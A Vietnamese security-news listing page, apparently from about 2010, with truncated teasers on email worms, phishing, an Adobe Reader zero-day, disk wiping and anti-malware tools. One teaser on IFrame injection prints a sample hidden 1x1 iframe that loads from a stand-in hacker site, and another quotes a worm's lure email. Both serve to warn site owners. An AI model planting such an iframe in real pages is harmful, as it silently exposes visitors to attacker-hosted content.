Bộ phận Phản ứng Bảo mật của Symantec vừa cảnh báo về một loại sâu mới W32.Imsolk.B@mm đang phán tán qua hòm thư điện tử với tốc độ chóng mặt, tấn công hàng trăm nghìn máy tính trên thế giới.

Bề ngoài như một hình thức tấn công mới nhưng thực chất chúng có nhiều nét tương đồng với các loại virus kiểu cũ đã từng phát tán mạnh qua email trước đây (năm 2001) như Nimda, Melissa và Anna Kournikova.


Theo báo cáo của nhóm Symantec Hosted Services (Dịch vụ Lưu ký Symantec), 26% trong tổng số virus lây lan trên toàn cầu hiện nay là W32.Imsolk.B@mm. Do mức độ lây lan nhanh và quy mô máy tính bị ảnh hưởng lớn nên Symantec đã nâng mức cảnh báo đối với loại sâu này lên mức 3 (mức trung bình) trong thang cảnh báo gồm 5 mức.

Sâu mới lây lan qua hình thức tấn công bằng email dựa trên kỹ thuật mạng xã ... Đọc tiếp »

Kỹ thuật tấn công theo kiểu IFrame Injection hiện vẫn đang là 1 dạng xâm nhập cơ bản và phổ biến nhất của mô hình Cross-Site Scripting – XSS. Bằng cách chèn vào các website động (ASP, PHP, CGI, JSP … ) những thẻ HTML hay những đoạn mã script nguy hiểm, trong đó những đoạn mã nguy hiểm đựơc chèn vào hầu hết được viết bằng các Client-Site Script như JavaScript, JScript, DHTML và cũng có thể là cả các thẻ HTML cơ bản. Nếu bạn phát hiện được có kẻ đang nhắm vào website của bạn bằng kỹ thuật này, không nên quá lo lắng. Sau đây là 1 số thao tác cần làm khi website lâm vào tình trạng này.

Ví dụ 1 đoãn mã độc hại thường được sử dụng để tấn công:

{xtypo_code}
<iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden"></iframe>
nội dung của đoạn mã độc
{/xtypo_code}

1. Thường xuy ... Đọc tiếp »

Các trang web xã hội càng có nhiều người biết đến, thì đồng nghĩa với xác suất rủi ro bị "dòm ngó” là rất cao, cụ thể trang mạng xã hội Facebook đã thay vị trí thứ 2 của eBay, trở thành nơi lý tưởng nhất cho những kẻ tấn công dạng lừa đảo trên mạng (phishing) bằng cách dùng hình thức thư rác (spam email)

Theo báo cáo của công ty giải pháp bảo mật Kaspersky Lab vào tháng 7 năm nay về khối lượng thư rác (spam) trên toàn cầu, Facebook đã tiếp nhận khoảng 12,81% lượng nội dung dạng phishing, tức gấp 3 lần hồi tháng 6. Bên cạnh ... Đọc tiếp »

Mã khai thác một lỗi nghiêm trọng chưa được vá trong Adobe Reader giờ đây đang lan truyền. Theo các nhà nghiên cứu bảo mật, mã này là "thông minh" và "ấn tượng".

Trong mã khai thác được nhà nghiên cứu bảo mật độc lập Mila Parkour (sống ở Washington, Mỹ) tiết lộ lần đầu tiên hôm thứ Ba 7/9/2010, kẻ tấn công sẽ sử dụng các tài liệu PDF gian lận có chứa mã khai thác lỗ hổng zero-day trong trình xem file PDF Reader cũng như trong Acrobat - phần mềm tạo file PDF của Adobe.

Mã khai thác tinh vi này vượt qua 2 cơ cấu phòng thủ quan trọng mà Microsoft dựng lên để bảo vệ Windows là ASLR (address space layout randomization - bố trí không gian địa chỉ ngẫu nh ... Đọc tiếp »

Theo McAfee Labs, một sâu mới lây lan qua danh sách địa chỉ email đang hoành hành Internet.

Theo McAfee Labs, ngày 9/9/2010, một sâu mới hoành hành Internet, virus này đang lây lan qua danh sách địa chỉ email của người dùng đã bị lây nhiễm. Bằng cách giả dạng như một tập tin PDF vô hại, sâu máy tính này trông giống như sau trong hộp thư:

Subject: Here you have (or "Just for you”)
Body: This is The Document I told you about, you can find it
Here. [link]
Please check it and reply as soon as possible.
Cheers.

Bạn cũng có thể đoán ra, địa chỉ này không dẫn bạn đến tập tin PDF, mà thay đó là tập tin có phần mở rộng .scr. Mặc dù tên miền trong đường liên kết trên email đã bị lây nhiễm này ... Đọc tiếp »

Trước khi bán hoặc tống khứ đi máy tính – dù nó còn làm việc hay không làm việc – bạn nên xóa sạch các tài liệu và dữ liệu nhạy cảm. Để an toàn tuyệt đối, bạn nên thực hiện điều này thậm chí rằng bạn chỉ để chúng ở đâu đó xung quanh nhà mình, chẳng hạn như gara để xe hay kho chứa đồ gì đó. Một điều mà bạn sẽ không bao giờ biết  là ai sẽ nhúng tay vào các máy tính cũ của mình.

Nếu bạn nghĩ mình chỉ cần xóa các tài liệu nhạy cảm và coi như có thể vứt bỏ hệ thống của mình một cách an toàn thì điều này hoàn toàn chưa đúng. Những dấu vết còn xót lại trên ổ cứng có thể tồn tại ngoài những gì bạn hình dung. Sự thật là làm trống rỗng Recycle Bin hoặc thậm chí format lại ổ cứng cũng chưa đủ an toàn.

Bạn có thể vẫn lưu lại các thư điện tử trên máy tính của mình, bao gồm các thông tin đăng nhập quan trọng và các nội ... Đọc tiếp »

Theo thông tin mới nhất của hãng bảo mật Symantec, gần 2/3 người dùng web (65%) trên toàn thế giới là nạn nhân của tội phạm mạng (bị lây nhiễm virus, mã độc và gian lận thẻ tín dụng). 

Theo đó, những người bị ảnh hưởng (58% nạn nhân của tội phạm mạng bao gồm cả bị lây nhiễm virus và gian lận thẻ tín dụng trực tuyến) cảm thấy tức giận, trong khi đó, 51% lại cho rằng, họ bị quấy rầy và 40% lại thừa nhận có cảm giác bị lừa.

Hơn nữa, 80% người dùng web không tin việc tội phạm mạng sẽ bị bắt trong khi chỉ có 3% tin rằng họ sẽ là nạn nhân của tội phạm mạng. 51% người dùng web cho biết, họ sẽ thay đổi thói quen sử dụng trên mạng nếu họ trở thành nạn nhân của bọn tội phạm mạng, trong khi đó chỉ 44% trong số đó thông báo lại vụ việc với cảnh sát.

Trung bình phải mất 28 ngày để giải quyết một vụ phạm tội trên mạng với chi p ... Đọc tiếp »

Được phân loại thuộc nhóm Net-Worms vô cùng độc hại, chúng có thuộc tính lây lan mạnh mẽ qua mạng máy tính, tính năng dễ phân biệt nhất của chúng là tự nhân bản và lây lan mà không cần đến sự tác động của người dùng. Đặc biệt, loại sâu này thường xuyên tìm kiếm các lỗ hổng bảo mật có trong các phần mềm hệ thống chạy trên các máy tính có kết nối với nhau hoặc Internet, qua đó chúng sẽ dễ dàng lây lan và phát tán hơn đến các máy tính thông qua các gói dữ liệu đặc biệt đã được chuẩn bị từ trước (gọi chung là exploit), và kết quả là mã độc của 1 phần hoặc toàn bộ "con sâu” này sẽ xâm nhập vào máy tính của nạn nhân và tự kích hoạt các chế độ hoạt động của chúng. Đôi khi, những gói dữ liệu lưu chuyển qua lại này chỉ chứa 1 phần nào đó của sâu, và những đoạn mã này có nhiệm vụ tải và thực thi các module còn lại của chúng qua con đường khác. Mặt khác, 1 số loại sâu chuyên phát tán và lây lan qua hệ thống mạng có xu hướng lây lan đồng loạt, để tăng tốc độ nhân bản ... Đọc tiếp »

Emsisoft – tác giả của ứng dụng bảo mật Anti-Malware 5.0 danh tiếng, vừa phát hành công cụ hỗ trợ miễn phí - Emergency Kit. Hiện nay, Emsisoft Anti-Malware 5.0 đang là 1 trong những ứng dụng bảo mật mạnh mẽ nhất trong lĩnh vực phát hiện và tiêu diệt phần mềm độc hại, công cụ vừa được phát hành hoàn toàn miễn phí, với đầy đủ các tính năng cần thiết ngoại trừ thành phần Real Time Protection.

Đối với Emergency Kit – bạn có thể coi đó là 1 chương trình portable vì nó có thể chạy trực tiếp trên USB khi được giải nén, với hơn 4 triệu mẫu chương trình độc hại luôn được cập nhật hàng ngày, người sử dụng có thể hoàn toàn yên tâm với sự bảo vệ toàn diện của bộ Kit này. Các tính năng cơ bản của phiên bản miễn phí đối với Emsisoft Anti-Malware 5.0 và Emergency Kit khá giống nhau, ngoại trừ bản miễn phí có yêu cầu cài đặt và tự động kích hoạt thêm ... Đọc tiếp »

Cũng giống như các phần mềm, mã code của trình duyệt Web có thể bị tấn công hoặc chứa những lỗ hổng dễ bị hacker hướng tới.

Trong bài báo này, chúng tôi sẽ đưa ra cho bạn 5 trang web có thể kiểm tra, đánh giá những điểm yếu và xác định thông tin cá nhân của bạn được tải như thế nào. Ngoài ra, một số trang còn đưa ra những lời khuyên về cách sở hữu một trình duyệt web an toàn.

Có thể bạn sẽ hỏi tại sao lại chỉ có 5. Đúng là có sự chồng chéo lên nhau. Tuy nhiên, bạn sẽ thấy mỗi trang sẽ cung cấp một kiểu thông báo khác nhau và hơn nữa, đây là những trang kiểm tra tốt nhất hiện nay.

1. Browserscope

Khi truy cập trang web Browserscope, điều đầu tiên bạn thấy là kết quả kiểm tra về việc so sánh rất nhiều khía cạnh của một trình duyệt web cơ bản. Do bài báo này nói ... Đọc tiếp »